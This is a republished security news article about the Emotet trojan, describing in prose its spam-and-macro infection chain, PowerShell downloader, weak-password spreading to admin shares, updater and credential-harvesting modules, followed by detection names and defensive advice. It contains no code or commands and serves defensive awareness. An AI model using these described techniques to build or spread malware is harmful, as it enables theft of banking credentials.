Watch out for Emotet, the trojan that’s nearly a worm

Készült: 2017. augusztus 10
Nyomtatás

Network worms and Trojan malware are back with a vengeance. A good example is WannaCry, which infected hundreds of thousands of computers across the globe in May. Now comes Emotet – malware with worm and trojan characteristics that exploits weak admin passwords to spread across a victim’s network.

SophosLabs has seen a surge in Emotet cases in the past week and has blocked it from customer computers. Its payload is a form of banking Trojan designed to steal a user’s online banking details. Labs researcher Tad Heppner described it this way:

Emotet is a trojan although it also contains the functionality necessary to be classified as a worm.  The primary distinction is that a trojan requires some degree of social engineering to trick a human into enabling the spread of the infection whereas a worm can spread to other systems without the aid of a user. Emotet downloads then executes other payloads, so even though its core component is not directly a worm, it does have the potential to download and execute another component to spread itself to other systems.

How it works

The initial infection is distributed via email spam.  Researchers pieced together the following sequence of events:

  • A spam email containing a download link arrives in the victim’s inbox.
  • The download link points to a Microsoft Word document.
  • The downloaded document contains VBA code that decodes and launches a Powershell script.
  • The Powershell script then attempts to download and run Emotet from multiple URL sources.

The Emotet components are contained in a self-extracting WinRAR archive bundled with a large dictionary of weak and commonly used passwords. (Note: WinRAR is a Windows file compression tool.)

The password dictionary is used to gain access to networked systems. Once it gains access, it copies itself to hidden C$ or Admin$ shares.  The copy is often given the filename my.exe, but other filenames have been used.

Emotet contains an embedded list of strings from which it chooses two words to meld into the filename it will use at the time of initial infection.  The strings chosen are seeded using the hard disk volume ID. As a result, the same hard disk will always result in the same filename for each infected system.

It also downloads a self-updating component capable of downloading the latest copy of itself and other modules.  This component is saved as %windows%\<filename>.exe, where the filename is comprised of 8 hexadecimal digits.

Some of the other modules this component downloads are used to harvest credentials from other known applications or to harvest email addresses from outlook PST files for use with targeted spam.

When the updater component updates the main Emotet component, it replaces the parent file using the same filename comprised of the same strings chosen earlier.  It then installs and runs the updated exe as a Windows service.

Recent Dridex and Qbot infections have also been discovered on Emotet-infected machines. It’s possible that Emotet’s ability to download and execute other payloads is currently being used to deploy geotargeted payloads.

Defensive measures

The attacker behind this outbreak has reacted to Sophos’ detections by creating new variants as the attacks persisted, taking advantage of the Emotet updating feature. They also changed the IP addresses they were downloading payloads from.

Nevertheless, Sophos is protecting customers from the threat and has created a Knowledge Base Article with a full breakdown of variants detected.

SophosLabs detects Emotet components as:

  • Mal/Emotet
  • HPmal/Emotet
  • Troj/EmotMem-A

To guard against malware exploiting Microsoft vulnerabilities in general:

  • Stay on top of all patch releases and apply them quickly.
  • If at all possible, replace older Windows systems with the latest versions.

Other advice:

  • If you receive a Word document by email and don’t know the person who sent it, don’t open it.
  • Block macros in Office documents.

  • Lock down file sharing across the network.

  • Make sure users do not have default admin access.

  • Enforce password best practices.

  • Use an anti-virus with an on-access scanner (also known as real-time protection).

  • Consider stricter email gateway settings.

  • Never turn off security features because an email or document says so.


Source: Naked Security

Hozzászólások

Hacktivity 2014

Események

Nincs esemény létrehozva még.

mySec talk #7 (ITBN)

A frissítés nélkül hagyott szoftverek magas aránya még mindig aggodalomra ad okot

A Secunia biztonsági cég jelentése azt mutatja, hogy az Egyesült Államokban rengeteg frissítés nélküli szoftver

Új titkosítási szabvány kerül bevezetésre az Apple-nél és a Google-nél

Az Apple azon bejelentésének nyomán, miszerint egy olyan fejlesztést eszközölnek az iOS8 operációs rendszerükön,

Önmegsemmisítő Facebook- és Twitter-üzeneteket és fotókat kínál a Dstrux

Egy cég, amely az üzleti dokumentumok biztonságba helyezésével foglalkozik, egy „Mission: Impossible” jellegű ö

Az FBI igazgatója szerint az Anonymous veszélyesebb, mint az al-Kaida

Múlt héten rendezték meg San Franciscóban az RSA biztonsági konferenciát, ahol az FBI jelenlegi igazgatója, Robert Mueller

CEO vs. CISO, avagy a biztonság két szemüvegen keresztül

A vállalatok igazgatói továbbra is nagyon eltérően tekintenek a kockázatokra és a védelmi teendőkre, mint a biztonsági v

Alig egy hét múlva Hacktivity

Október 21–22-én, immáron 13. alkalommal gyűlnek össze az etikus

Az Index.hu újságírója lett az „Év információbiztonsági újságírója”

A Hétpecsét Információbiztonsági Egyesület 2006-ban alap&iac

Boldog Új Évet Kívánunk! - 2016.

Az Antivirus.blog nevében Minden Kedves Olvasónknak Egészségben, siker

Ez történt 2015-ben

Nem volt eseménytelen esztendő a 2015. - sem. A legizgalmasabb incidense

mySec Információ